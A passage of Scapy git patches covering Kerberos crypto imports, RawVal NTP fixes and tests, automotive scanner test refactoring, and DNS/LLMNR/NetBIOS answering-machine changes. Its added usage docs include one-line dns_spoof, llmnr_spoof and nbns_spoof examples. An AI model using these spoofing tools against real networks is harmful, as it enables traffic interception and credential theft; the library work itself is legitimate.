MD5, SHA - from Cryptodome.Protocol.KDF import PBKDF2 + try: + from Cryptodome.Cipher import AES, DES3, ARC4, DES + from Cryptodome.Hash import HMAC, MD4, MD5, SHA + from Cryptodome.Protocol.KDF import PBKDF2 + except ImportError: + # Backward compatibility + from Crypto.Cipher import AES, DES3, ARC4, DES + from Crypto.Hash import HMAC, MD4, MD5, SHA + from Crypto.Protocol.KDF import PBKDF2 except ImportError: raise ImportError( "To use kerberos cryptography, you need to install pycryptodome.\n" @@ -668,7 +674,7 @@ def __repr__(self): ) def encrypt(self, keyusage, plaintext, confounder=None): - return self.ep.encrypt(self, keyusage, bytes(plaintext), bytes(confounder)) + return self.ep.encrypt(self, keyusage, bytes(plaintext), confounder) def decrypt(self, keyusage, ciphertext): # Throw InvalidChecksum on checksum failure. Throw ValueError on @@ -724,6 +730,11 @@ def prfplus(key, pepper): count += 1 return out[: key.ep.seedsize] - return _xorbytes( - bytearray(prfplus(key1, pepper1)), bytearray(prfplus(key2, pepper2)) + return Key( + key1.eptype, + key=bytes( + _xorbytes( + bytearray(prfplus(key1, pepper1)), bytearray(prfplus(key2, pepper2)) + ) + ), ) diff --git a/scapy/packet.py b/scapy/packet.py index a8963aaa284..580030e363b 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -1646,6 +1646,11 @@ def command(self): fv = fv.command() elif fld.islist and fld.holds_packets and isinstance(fv, list): fv = "[%s]" % ",".join(map(Packet.command, fv)) + elif fld.islist and isinstance(fv, list): + fv = "[%s]" % ", ".join( + getattr(x, 'command', lambda: repr(x))() + for x in fv + ) elif isinstance(fld, FlagsField): fv = int(fv) elif callable(getattr(fv, 'command', None)): diff --git a/test/run_tests b/test/run_tests index 594f74dbf35..ce743510b6a 100755 --- a/test/run_tests +++ b/test/run_tests @@ -54,7 +54,7 @@ then fi # Run tox - export UT_FLAGS="-K tcpdump -K manufdb -K wireshark -K ci_only -K vcan_socket -K automotive_comm" + export UT_FLAGS="-K tcpdump -K manufdb -K wireshark -K ci_only -K vcan_socket -K automotive_comm -K imports" export SIMPLE_TESTS="true" PYVER=$($PYTHON -c "import sys; print('.'.join(sys.version.split('.')[:2]))") ${DIR}/.config/ci/test.sh $PYVER non_root From 7ba7a25fa41e07243ff7af7c693e2d1ad8af6f6a Mon Sep 17 00:00:00 2001 From: Wael Mahlous Date: Sun, 17 Jul 2022 01:13:19 +0100 Subject: [PATCH 0854/1632] Make RawVal work with all field types (fix for issue #3691) Using RawVal with certain field types, e.g. FixedPointField, fails with a TypeError like the one below: >>> NTP(orig=RawVal(b"\xe6}gt\x00\x00\x00\x00")) --------------------------------------------------------------------------- TypeError Traceback (most recent call last) File /home/user/.local/lib/python3.8/site-packages/IPython/core/formatters.py:707, in PlainTextFormatter.__call__(self, obj) 700 stream = StringIO() 701 printer = pretty.RepresentationPrinter(stream, self.verbose, 702 self.max_width, self.newline, 703 max_seq_length=self.max_seq_length, 704 singleton_pprinters=self.singleton_printers, 705 type_pprinters=self.type_printers, 706 deferred_pprinters=self.deferred_printers) --> 707 printer.pretty(obj) 708 printer.flush() 709 return stream.getvalue() File /home/user/.local/lib/python3.8/site-packages/IPython/lib/pretty.py:410, in RepresentationPrinter.pretty(self, obj) 407 return meth(obj, self, cycle) 408 if cls is not object \ 409 and callable(cls.__dict__.get('__repr__')): --> 410 return _repr_pprint(obj, self, cycle) 412 return _default_pprint(obj, self, cycle) 413 finally: File /home/user/.local/lib/python3.8/site-packages/IPython/lib/pretty.py:778, in _repr_pprint(obj, p, cycle) 776 """A pprint that just redirects to the normal repr function.""" 777 # Find newlines and replace them with p.break_() --> 778 output = repr(obj) 779 lines = output.splitlines() 780 with p.group(): File /home/user/.local/lib/python3.8/site-packages/scapy/packet.py:533, in Packet.__repr__(self) 531 if isinstance(fval, (list, dict, set)) and len(fval) == 0: 532 continue --> 533 val = f.i2repr(self, fval) 534 elif f.name in self.overloaded_fields: 535 fover = self.overloaded_fields[f.name] File /home/user/.local/lib/python3.8/site-packages/scapy/layers/ntp.py:80, in TimeStampField.i2repr(self, pkt, val) 78 if val is None: 79 return "--" ---> 80 val = self.i2h(pkt, val) 81 if val < _NTP_BASETIME: 82 return val File /home/user/.local/lib/python3.8/site-packages/scapy/fields.py:3044, in FixedPointField.i2h(self, pkt, val) 3041 def i2h(self, pkt, val): 3042 # type: (Optional[Packet], int) -> EDecimal 3043 # A bit of trickery to get precise floats -> 3044 int_part = val >> self.frac_bits 3045 pw = 2.0**self.frac_bits 3046 frac_part = EDecimal(val & (1 << self.frac_bits) - 1) TypeError: unsupported operand type(s) for >>: 'RawVal' and 'int' The root cause is that the field's `any2i()` or `i2h()` methods may be expecting a certain value type instead of RawVal. To fix this, we check if the value is a RawVal before calling either of those methods. Doing this in packet.py saves us from having to do it in ALL `any2i()` and `i2h()` methods (at least the ones which fail when given a RawVal). --- scapy/packet.py | 8 +++++--- test/scapy/layers/ntp.uts | 43 +++++++++++++++++++++++++++++++++++++++ 2 files changed, 48 insertions(+), 3 deletions(-) diff --git a/scapy/packet.py b/scapy/packet.py index 580030e363b..71e15f9beed 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -174,14 +174,16 @@ def __init__(self, value = fields.pop(fname) except KeyError: continue - self.fields[fname] = self.get_field(fname).any2i(self, value) + self.fields[fname] = value if isinstance(value, RawVal) else \ + self.get_field(fname).any2i(self, value) # The remaining fields are unknown for fname in fields: if fname in self.deprecated_fields: # Resolve deprecated fields value = fields[fname] fname = self._resolve_alias(fname) - self.fields[fname] = self.get_field(fname).any2i(self, value) + self.fields[fname] = value if isinstance(value, RawVal) else \ + self.get_field(fname).any2i(self, value) continue raise AttributeError(fname) if isinstance(post_transform, list): @@ -453,7 +455,7 @@ def __getattr__(self, attr): except ValueError: return self.payload.__getattr__(attr) if fld is not None: - return fld.i2h(self, v) + return v if isinstance(v, RawVal) else fld.i2h(self, v) return v def setfieldval(self, attr, val): diff --git a/test/scapy/layers/ntp.uts b/test/scapy/layers/ntp.uts index a14198c02ce..4e89dc40d4e 100644 --- a/test/scapy/layers/ntp.uts +++ b/test/scapy/layers/ntp.uts @@ -1095,3 +1095,46 @@ assert(isinstance(p.data[0], NTPInfoIfStatsIPv4)) assert(p.data[0].unaddr == "127.0.0.1") assert(p.data[0].unmask == "255.0.0.0") assert(p.data[0].ifname.startswith(b"lo")) + +############ +############ ++ RawVal tests + += Build an NTP packet using RawVal + +from decimal import Decimal + +precision = b"\xec" # 236 +dispersion = b"\x00\x00\xf2\xce" # 0.948455810546875 +time_stamp = b"\xe6}gt\x00\x00\x00\x00" # Sat, 16 Jul 2022 16:36:04 +0000 + +pkt_1 = NTP( + precision=RawVal(precision), + dispersion=RawVal(dispersion), + orig=RawVal(time_stamp), + sent=RawVal(time_stamp), +) + +assert(isinstance(pkt_1.precision, RawVal)), type(pkt_1.precision) +assert(isinstance(pkt_1.dispersion, RawVal)), type(pkt_1.dispersion) +assert(isinstance(pkt_1.orig, RawVal)), type(pkt_1.orig) +assert(isinstance(pkt_1.sent, RawVal)), type(pkt_1.sent) + +assert(pkt_1.precision.val == precision), pkt_1.precision.val +assert(pkt_1.dispersion.val == dispersion), pkt_1.dispersion.val +assert(pkt_1.orig.val == time_stamp), pkt_1.orig.val +assert(pkt_1.sent.val == time_stamp), pkt_1.sent.val + +time_stamp_hex = 0x00000000e67d6774 +pkt_2 = NTP( + precision=236, + dispersion=Decimal('0.948455810546875'), + orig=time_stamp_hex, + sent=time_stamp_hex +) + +raw_pkt = (b"#\x02\n\xec\x00\x00\x00\x00\x00\x00\xf2\xce\x7f\x00\x00\x01\x00" + b"\x00\x00\x00\x00\x00\x00\x00\xe6}gt\x00\x00\x00\x00\x00\x00\x00" + b"\x00\x00\x00\x00\x00\xe6}gt\x00\x00\x00\x00") + +assert(raw(pkt_1) == raw(pkt_2) == raw_pkt) \ No newline at end of file From e6eaa484b8fa3d10051e82f5a784fe8dedbd5592 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 20 Jul 2022 21:47:17 +0200 Subject: [PATCH 0855/1632] Add assert to GMLAN Scanner to enforce fast fail on to many open TestSockets Fix bugs in TestSocket Fix bugs in the AutomotiveScanner execution_time handling Simplify test code for UDS_Scanner and reuse ObjectPipes to avoid mass creation --- scapy/contrib/automotive/scanner/executor.py | 19 ++++-- test/contrib/automotive/gm/scanner.uts | 5 +- .../automotive/scanner/uds_scanner.uts | 63 ++++++++---------- test/testsocket.py | 64 ++++++++++--------- 4 files changed, 80 insertions(+), 71 deletions(-) diff --git a/scapy/contrib/automotive/scanner/executor.py b/scapy/contrib/automotive/scanner/executor.py index 66eaa96e79b..0ceab0b9320 100644 --- a/scapy/contrib/automotive/scanner/executor.py +++ b/scapy/contrib/automotive/scanner/executor.py @@ -160,16 +160,20 @@ def reconnect(self): raise Scapy_Exception( "Socket closed even after reconnect. Stop scan!") - def execute_test_case(self, test_case): - # type: (AutomotiveTestCaseABC) -> None + def execute_test_case(self, test_case, kill_time=None): + # type: (AutomotiveTestCaseABC, Optional[float]) -> None """ This function ensures the correct execution of a testcase, including the pre_execute, execute and post_execute. Finally the testcase is asked if a new edge or a new testcase was generated. + :param test_case: A test case to be executed + :param kill_time: If set, this defines the maximum execution time for + the current test_case :return: None """ + test_case.pre_execute( self.socket, self.target_state, self.configuration) @@ -178,6 +182,12 @@ def execute_test_case(self, test_case): except KeyError: test_case_kwargs = dict() + if kill_time: + max_execution_time = max(int(kill_time - time.time()), 5) + cur_execution_time = test_case_kwargs.get("execution_time", 1200) + test_case_kwargs["execution_time"] = min(max_execution_time, + cur_execution_time) + log_interactive.debug("[i] Execute test_case %s with args %s", test_case.__class__.__name__, test_case_kwargs) @@ -220,13 +230,14 @@ def scan(self, timeout=None): :return: None """ kill_time = time.time() + (timeout or 0xffffffff) + log_interactive.debug("[i] Set kill_time to %s" % time.ctime(kill_time)) while kill_time > time.time(): test_case_executed = False log_interactive.debug("[i] Scan paths %s", self.state_paths) for p, test_case in product( self.state_paths, self.configuration.test_cases): log_interactive.info("[i] Scan path %s", p) - terminate = kill_time < time.time() + terminate = kill_time <= time.time() if terminate: log_interactive.debug( "[-] Execution time exceeded. Terminating scan!") @@ -245,7 +256,7 @@ def scan(self, timeout=None): continue log_interactive.info( "[i] Execute %s for path %s", str(test_case), p) - self.execute_test_case(test_case) + self.execute_test_case(test_case, kill_time) test_case_executed = True except (OSError, ValueError, Scapy_Exception) as e: log_interactive.critical("[-] Exception: %s", e) diff --git a/test/contrib/automotive/gm/scanner.uts b/test/contrib/automotive/gm/scanner.uts index cbd956de824..1c33362bf7a 100644 --- a/test/contrib/automotive/gm/scanner.uts +++ b/test/contrib/automotive/gm/scanner.uts @@ -8,7 +8,7 @@ import itertools from scapy.contrib.isotp import ISOTPMessageBuilder -from test.testsocket import TestSocket, cleanup_testsockets +from test.testsocket import TestSocket, cleanup_testsockets, open_test_sockets ############ @@ -43,6 +43,7 @@ def executeScannerInVirtualEnvironment(supported_responses, enumerators, **kwarg ecu.close() except Exception: pass + assert len(open_test_sockets) < 3 ecu = TestSocket(GMLAN) tester.pair(ecu) answering_machine = EcuAnsweringMachine(supported_responses=supported_responses, main_socket=ecu, basecls=GMLAN, verbose=False) @@ -55,11 +56,13 @@ def executeScannerInVirtualEnvironment(supported_responses, enumerators, **kwarg sim.start() answering_machine_started.wait(timeout=10) try: + assert len(open_test_sockets) < 3 scanner = GMLAN_Scanner( tester, reset_handler=reset, test_cases=enumerators, timeout=0.2, retry_if_none_received=True, unittest=True, **kwargs) for i in range(12): + print("Starting scan") scanner.scan(timeout=10) if scanner.scan_completed: print("Scan completed after %d iterations" % i) diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index 46ad7619c1f..9aa4807210d 100644 --- a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -7,7 +7,8 @@ import io import pickle from scapy.contrib.isotp import ISOTPMessageBuilder -from test.testsocket import TestSocket, cleanup_testsockets, UnstableSocket, open_test_sockets +from test.testsocket import TestSocket, cleanup_testsockets, UnstableSocket +from scapy.automaton import ObjectPipe ############ ############ @@ -27,61 +28,51 @@ load_layer("can") = Define Testfunction def executeScannerInVirtualEnvironment(supported_responses, enumerators, unstable_socket=True, **kwargs): + tester_obj_pipe = ObjectPipe(name="TesterPipe") + ecu_obj_pipe = ObjectPipe(name="ECUPipe") TesterSocket = UnstableSocket if unstable_socket else TestSocket - answering_machine_started = threading.Event() - answering_machine_running = threading.Event() - answering_machine_running.set() + tester = TesterSocket(UDS, tester_obj_pipe) + ecu = TestSocket(UDS, ecu_obj_pipe) + tester.pair(ecu) + answering_machine = EcuAnsweringMachine( + supported_responses=supported_responses, main_socket=ecu, + basecls=UDS, verbose=False) def reset(): answering_machine.state.reset() answering_machine.state["session"] = 1 sniff(timeout=0.001, opened_socket=[ecu, tester]) def reconnect(): - global tester try: tester.close() except Exception: pass - tester = TesterSocket(UDS) + tester = TesterSocket(UDS, tester_obj_pipe) ecu.pair(tester) return tester def answering_machine_thread(): - global ecu - global answering_machine - while answering_machine_running.is_set(): - try: - try: - ecu.close() - except Exception: - pass - assert len(open_test_sockets) < 3 - ecu = TestSocket(UDS) - tester.pair(ecu) - answering_machine = EcuAnsweringMachine(supported_responses=supported_responses, main_socket=ecu, basecls=UDS, verbose=False) - answering_machine_started.set() - answering_machine(timeout=120, stop_filter=lambda x: bytes(x) == b"\xff\xff\xff") - return - except OSError: - continue + answering_machine( + timeout=120, stop_filter=lambda x: bytes(x) == b"\xff\xff\xff") sim = threading.Thread(target=answering_machine_thread) try: - assert len(open_test_sockets) < 3 sim.start() - answering_machine_started.wait(timeout=10) scanner = UDS_Scanner( - reconnect(), reset_handler=reset, reconnect_handler=reconnect, test_cases=enumerators, timeout=0.1, + tester, reset_handler=reset, reconnect_handler=reconnect, + test_cases=enumerators, timeout=0.1, retry_if_none_received=True, unittest=True, **kwargs) - for i in range(100): + for i in range(12): + print("Starting scan") scanner.scan(timeout=10) if scanner.scan_completed: print("Scan completed after %d iterations" % i) break finally: - answering_machine_running.clear() ecu.ins.send(Raw(b"\xff\xff\xff")) sim.join(timeout=2) assert not sim.is_alive() cleanup_testsockets() + tester_obj_pipe.close() + ecu_obj_pipe.close() if six.PY3 and LINUX: pickle_test(scanner) return scanner @@ -156,22 +147,22 @@ assert e._retry_pkt[s] == None = Test UDS_SA_XOR_Enumerator stand alone mode TesterSocket = TestSocket -ecu = TestSocket(UDS) -tester = TesterSocket(UDS) -ecu.pair(tester) -answering_machine = EcuAnsweringMachine(supported_responses=mEcu.supported_responses, main_socket=ecu, basecls=UDS, verbose=False) +ecu_sock = TestSocket(UDS) +mTester = TesterSocket(UDS) +ecu_sock.pair(mTester) +answering_machine = EcuAnsweringMachine(supported_responses=mEcu.supported_responses, main_socket=ecu_sock, basecls=UDS, verbose=False) sim = threading.Thread(target=answering_machine, kwargs={'timeout': 1000, "stop_filter": lambda x: bytes(x) == b"\xff\xff\xff"}) sim.start() try: - resp = tester.sr1(UDS()/UDS_TP(b"\x00"), verbose=False, timeout=1) + resp = mTester.sr1(UDS()/UDS_TP(b"\x00"), verbose=False, timeout=1) print(repr(resp)) assert resp and resp.service != 0x7f - resp = tester.sr1(UDS()/UDS_DSC(diagnosticSessionType=3), verbose=False, timeout=1) + resp = mTester.sr1(UDS()/UDS_DSC(diagnosticSessionType=3), verbose=False, timeout=1) print(repr(resp)) assert resp and resp.service != 0x7f - assert UDS_SA_XOR_Enumerator().get_security_access(tester, 1) + assert UDS_SA_XOR_Enumerator().get_security_access(mTester, 1) finally: - tester.send(Raw(b"\xff\xff\xff")) + mTester.send(Raw(b"\xff\xff\xff")) sim.join(timeout=2) cleanup_testsockets() diff --git a/test/testsocket.py b/test/testsocket.py index 32252ded11e..81e71e16acf 100644 --- a/test/testsocket.py +++ b/test/testsocket.py @@ -28,14 +28,17 @@ class TestSocket(SuperSocket): test_socket_mutex = Lock() - def __init__(self, basecls=None): - # type: (Optional[Type[Packet]]) -> None + def __init__(self, + basecls=None, # type: Optional[Type[Packet]] + external_obj_pipe=None # type: Optional[ObjectPipe[bytes]] + ): + # type: (...) -> None global open_test_sockets - super(TestSocket, self).__init__() self.basecls = basecls self.paired_sockets = list() # type: List[TestSocket] - self.closed = False - self.ins = self.outs = cast(socket, ObjectPipe(name="TestSocket")) + self.ins = external_obj_pipe or ObjectPipe(name="TestSocket") # type: ignore + self._has_external_obj_pip = external_obj_pipe is not None + self.outs = None open_test_sockets.append(self) def __enter__(self): @@ -51,27 +54,30 @@ def close(self): # type: () -> None global open_test_sockets - with self.test_socket_mutex: - if self.closed: - return + if self.closed: + return - self.closed = True - for s in self.paired_sockets: - try: - s.paired_sockets.remove(self) - except (ValueError, AttributeError, TypeError): - pass - super(TestSocket, self).close() + for s in self.paired_sockets: try: - open_test_sockets.remove(self) + s.paired_sockets.remove(self) except (ValueError, AttributeError, TypeError): pass + if not self._has_external_obj_pip: + super(TestSocket, self).close() + else: + # We don't close external object pipes + self.closed = True + + try: + open_test_sockets.remove(self) + except (ValueError, AttributeError, TypeError): + pass + def pair(self, sock): # type: (TestSocket) -> None - with self.test_socket_mutex: - self.paired_sockets += [sock] - sock.paired_sockets += [self] + self.paired_sockets += [sock] + sock.paired_sockets += [self] def send(self, x): # type: (Packet) -> int @@ -89,10 +95,6 @@ def recv_raw(self, x=MTU): """Returns a tuple containing (cls, pkt_data, time)""" return self.basecls, self.ins.recv(0), time.time() - def __del__(self): - # type: () -> None - self.close() - @staticmethod def select(sockets, remain=conf.recv_poll_rate): # type: (List[SuperSocket], Optional[float]) -> List[SuperSocket] @@ -105,9 +107,12 @@ class UnstableSocket(TestSocket): packets on recv. """ - def __init__(self, basecls=None): - # type: (Optional[Type[Packet]]) -> None - super(UnstableSocket, self).__init__(basecls) + def __init__(self, + basecls=None, # type: Optional[Type[Packet]] + external_obj_pipe=None # type: Optional[ObjectPipe[bytes]] + ): + # type: (...) -> None + super(UnstableSocket, self).__init__(basecls, external_obj_pipe) self.no_error_for_x_rx_pkts = 10 self.no_error_for_x_tx_pkts = 10 @@ -147,9 +152,8 @@ def cleanup_testsockets(): """ Helper function to remove TestSocket objects after a test """ - count = 100 - while len(open_test_sockets) and count > 0: - print(open_test_sockets) - count -= 1 + count = max(len(open_test_sockets), 1) + while len(open_test_sockets) and count: sock = open_test_sockets[0] sock.close() + count -= 1 From 55953ba394cfe3abe86814e4fa9c9126ba209bbf Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 18 Jul 2022 21:50:41 +0200 Subject: [PATCH 0856/1632] Fix minor bug in Automotive_Scanner kwargs validation --- scapy/contrib/automotive/scanner/enumerator.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py index a2d0653c0f1..d26b8bf71fc 100644 --- a/scapy/contrib/automotive/scanner/enumerator.py +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -53,7 +53,7 @@ class ServiceEnumerator(AutomotiveTestCase): _supported_kwargs = copy.copy(AutomotiveTestCase._supported_kwargs) _supported_kwargs.update({ - 'timeout': ((int, float), lambda x: x >= 0), + 'timeout': ((int, float), lambda x: x > 0), 'count': (int, lambda x: x >= 0), 'execution_time': (int, None), 'state_allow_list': ((list, EcuState), None), From e7f477f24bc314476596232c043334afa1b2882b Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 18 Jul 2022 22:18:36 +0200 Subject: [PATCH 0857/1632] Fix debug output of RMBAEnumerator Unit-Test and lower threshold --- test/contrib/automotive/scanner/uds_scanner.uts | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index 9aa4807210d..68bfa3992cb 100644 --- a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -921,8 +921,8 @@ print(float([tp in addrs for tp in mem_inner_borders].count(True)) / len(mem_inn assert float([tp in addrs for tp in mem_inner_borders].count(True)) / len(mem_inner_borders) > 0.8 print(float([tp in addrs for tp in mem_random_test_points].count(True)) / len(mem_random_test_points)) assert float([tp in addrs for tp in mem_random_test_points].count(True)) / len(mem_random_test_points) > 0.8 -print(float([tp in addrs for tp in mem_outer_borders].count(True)) / len(mem_outer_borders)) -assert float([tp not in addrs for tp in mem_outer_borders].count(True)) / len(mem_outer_borders) > 0.8 +print(float([tp not in addrs for tp in mem_outer_borders].count(True)) / len(mem_outer_borders)) +assert float([tp not in addrs for tp in mem_outer_borders].count(True)) / len(mem_outer_borders) > 0.7 = UDS_TDEnumerator From aa4f2ef87308394748b3373bed37c0e42836b91c Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 27 Jul 2022 08:54:51 +0200 Subject: [PATCH 0858/1632] Simplify GMLAN Scanner tests --- test/contrib/automotive/gm/scanner.uts | 27 ++++---------------------- 1 file changed, 4 insertions(+), 23 deletions(-) diff --git a/test/contrib/automotive/gm/scanner.uts b/test/contrib/automotive/gm/scanner.uts index 1c33362bf7a..3a2855e5f19 100644 --- a/test/contrib/automotive/gm/scanner.uts +++ b/test/contrib/automotive/gm/scanner.uts @@ -28,35 +28,17 @@ load_layer("can") def executeScannerInVirtualEnvironment(supported_responses, enumerators, **kwargs): tester = TestSocket(GMLAN) - answering_machine_started = threading.Event() - answering_machine_running = threading.Event() - answering_machine_running.set() + ecu = TestSocket(GMLAN) + tester.pair(ecu) + answering_machine = EcuAnsweringMachine(supported_responses=supported_responses, main_socket=ecu, basecls=GMLAN, verbose=False) def reset(): answering_machine.reset_state() sniff(timeout=0.001, opened_socket=[ecu, tester]) def answering_machine_thread(): - global ecu - global answering_machine - while answering_machine_running.is_set(): - try: - try: - ecu.close() - except Exception: - pass - assert len(open_test_sockets) < 3 - ecu = TestSocket(GMLAN) - tester.pair(ecu) - answering_machine = EcuAnsweringMachine(supported_responses=supported_responses, main_socket=ecu, basecls=GMLAN, verbose=False) - answering_machine_started.set() - answering_machine(timeout=120, stop_filter=lambda x: bytes(x) == b"\xff\xff\xff") - return - except OSError: - continue + answering_machine(timeout=120, stop_filter=lambda x: bytes(x) == b"\xff\xff\xff") sim = threading.Thread(target=answering_machine_thread) sim.start() - answering_machine_started.wait(timeout=10) try: - assert len(open_test_sockets) < 3 scanner = GMLAN_Scanner( tester, reset_handler=reset, test_cases=enumerators, timeout=0.2, retry_if_none_received=True, @@ -68,7 +50,6 @@ def executeScannerInVirtualEnvironment(supported_responses, enumerators, **kwarg print("Scan completed after %d iterations" % i) break finally: - answering_machine_running.clear() tester.send(Raw(b"\xff\xff\xff")) sim.join(timeout=2) assert not sim.is_alive() From dd7a5c97d68c00d1d03ecf8ac27c6c7038525065 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 8 Aug 2022 01:12:55 +0200 Subject: [PATCH 0859/1632] Answering machines improvements (NBNS/DNS/LLMNR) (#3699) * Minor NBNS improvements * Improve Netbios/LLMNR/DNS answering machines * DNS_am: support IPv6 * More customization of some answering machines --- doc/scapy/usage.rst | 33 +++++++++- scapy/ansmachine.py | 34 ++++++----- scapy/arch/__init__.py | 5 +- scapy/layers/dns.py | 62 ++++++++++++++++--- scapy/layers/l2.py | 20 ++++-- scapy/layers/llmnr.py | 25 +++++++- scapy/layers/netbios.py | 111 ++++++++++++++++++++++------------ test/answering_machines.uts | 3 +- test/scapy/layers/netbios.uts | 15 ++++- 9 files changed, 231 insertions(+), 77 deletions(-) diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index e4e3c5e1f15..91c64efa607 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -1450,8 +1450,37 @@ and receiving the answers:: Visualizing the results in a list:: >>> res.nsummary(prn=lambda s,r: r.src, lfilter=lambda s,r: r.haslayer(ISAKMP) ) - - + + +DNS spoof +--------- + +See :class:`~scapy.layers.dns.DNS_am`:: + + >>> dns_spoof(iface="tap0", joker="192.168.1.1") + +LLMNR spoof +----------- + +See :class:`~scapy.layers.llmnr.LLMNR_am`:: + + >>> conf.iface = "tap0" + >>> llmnr_spoof(iface="tap0", filter_ips=Net("10.0.0.1/24")) + +Netbios spoof +------------- + +See :class:`~scapy.layers.netbios.NBNS_am`:: + + >>> nbns_spoof(iface="eth0") # With local IP + >>> nbns_spoof(iface="eth0", ip="192.168.122.17") # With some other IP + +Node status request (get NetbiosName from IP) +--------------------------------------------- + +.. code:: + + >>> sr1(IP(dst="192.168.122.17")/UDP()/NBNSHeader()/NBNSNodeStatusRequest()) Advanced traceroute ------------------- diff --git a/scapy/ansmachine.py b/scapy/ansmachine.py index 228f9b6755e..7232b31dcd6 100644 --- a/scapy/ansmachine.py +++ b/scapy/ansmachine.py @@ -59,6 +59,7 @@ def __new__(cls, func = lambda obj=obj, *args, **kargs: obj(*args, **kargs)() # type: ignore # noqa: E501 # Inject signature func.__name__ = func.__qualname__ = obj.function_name + func.__doc__ = obj.__doc__ or obj.parse_options.__doc__ try: func.__signature__ = obj.__signature__ # type: ignore except (AttributeError): @@ -210,24 +211,27 @@ def sniff(self): class AnsweringMachineUtils: @staticmethod - def reverse_packet(req): - # type: (Packet) -> Packet - from scapy.layers.l2 import Ether + def reverse_packet(req, mirror_src=False): + # type: (Packet, bool) -> Optional[Packet] from scapy.layers.inet import IP, TCP, UDP - reply = req.copy() + from scapy.layers.inet6 import IPv6 + if IP in req: + resp = IP( + dst=req[IP].src, + src=mirror_src and req[IP].dst or None, + ) + elif IPv6 in req: + resp = IPv6( + dst=req[IPv6].src, + src=mirror_src and req[IPv6].dst or None, + ) + else: + return None for layer in [UDP, TCP]: if req.haslayer(layer): - reply[layer].dport, reply[layer].sport = \ - req[layer].sport, req[layer].dport - reply[layer].chksum = None - reply[layer].len = None - if req.haslayer(IP): - reply[IP].src, reply[IP].dst = req[IP].dst, req[IP].src - reply[IP].chksum = None - reply[IP].len = None - if req.haslayer(Ether): - reply[Ether].src, reply[Ether].dst = req[Ether].dst, req[Ether].src - return reply + resp /= layer(dport=req.sport, sport=req.dport) + break + return cast(Packet, resp) class AnsweringMachineTCP(AnsweringMachine[Packet]): diff --git a/scapy/arch/__init__.py b/scapy/arch/__init__.py index f05e072133a..eda7ea4d948 100644 --- a/scapy/arch/__init__.py +++ b/scapy/arch/__init__.py @@ -21,7 +21,7 @@ IPV6_ADDR_GLOBAL ) from scapy.error import Scapy_Exception -from scapy.interfaces import NetworkInterface +from scapy.interfaces import NetworkInterface, network_name from scapy.pton_ntop import inet_pton, inet_ntop # Typing imports @@ -84,13 +84,14 @@ def get_if_hwaddr(iff): raise Scapy_Exception("Unsupported address family (%i) for interface [%s]" % (addrfamily, iff)) # noqa: E501 -def get_if_addr6(iff): +def get_if_addr6(niff): # type: (NetworkInterface) -> Optional[str] """ Returns the main global unicast address associated with provided interface, in human readable form. If no global address is found, None is returned. """ + iff = network_name(niff) return next((x[0] for x in in6_getifaddr() if x[2] == iff and x[1] == IPV6_ADDR_GLOBAL), None) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 3ecb80936a8..cd26adbfa3a 100755 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -14,7 +14,8 @@ import time import warnings -from scapy.ansmachine import AnsweringMachine +from scapy.arch import get_if_addr, get_if_addr6 +from scapy.ansmachine import AnsweringMachine, AnsweringMachineUtils from scapy.base_classes import Net from scapy.config import conf from scapy.compat import orb, raw, chb, bytes_encode, plain_str @@ -1108,22 +1109,65 @@ def dyndns_del(nameserver, name, type="ALL", ttl=10): class DNS_am(AnsweringMachine): function_name = "dns_spoof" filter = "udp port 53" + cls = DNS # We use this automaton for llmnr_spoof - def parse_options(self, joker="192.168.1.1", match=None): + def parse_options(self, joker=None, + match=None, joker6=None, from_ip=None): + """ + :param joker: default IPv4 for unresolved domains. (Default: None) + Set to False to disable, None to mirror the interface's IP. + :param joker6: default IPv6 for unresolved domains (Default: False) + set to False to disable, None to mirror the interface's IPv6. + :param match: a dictionary of {names: (ip, ipv6)} + :param from_ip: an source IP to filter. Can contain a netmask + """ if match is None: self.match = {} else: self.match = match self.joker = joker + self.joker6 = joker6 + if isinstance(from_ip, str): + self.from_ip = Net(from_ip) + else: + self.from_ip = from_ip def is_request(self, req): - return req.haslayer(DNS) and req.getlayer(DNS).qr == 0 + from scapy.layers.inet6 import IPv6 + return ( + req.haslayer(self.cls) and + req.getlayer(self.cls).qr == 0 and + (not self.from_ip or ( + req[IPv6].src in req if IPv6 in req else req[IP].src + ) in self.from_ip) + ) def make_reply(self, req): - ip = req.getlayer(IP) - dns = req.getlayer(DNS) - resp = IP(dst=ip.src, src=ip.dst) / UDP(dport=ip.sport, sport=ip.dport) - rdata = self.match.get(dns.qd.qname, self.joker) - resp /= DNS(id=dns.id, qr=1, qd=dns.qd, - an=DNSRR(rrname=dns.qd.qname, ttl=10, rdata=rdata)) + resp = AnsweringMachineUtils.reverse_packet(req) + dns = req.getlayer(self.cls) + if req.qd.qtype == 28: + # AAAA + if self.joker6 is False: + return + rdata = self.match.get( + dns.qd.qname, + self.joker or get_if_addr6(self.optsniff.get("iface", conf.iface)) + ) + if isinstance(rdata, (tuple, list)): + rdata = rdata[1] + resp /= self.cls(id=dns.id, qr=1, qd=dns.qd, + an=DNSRR(rrname=dns.qd.qname, ttl=10, rdata=rdata, + type=28)) + else: + if self.joker is False: + return + rdata = self.match.get( + dns.qd.qname, + self.joker or 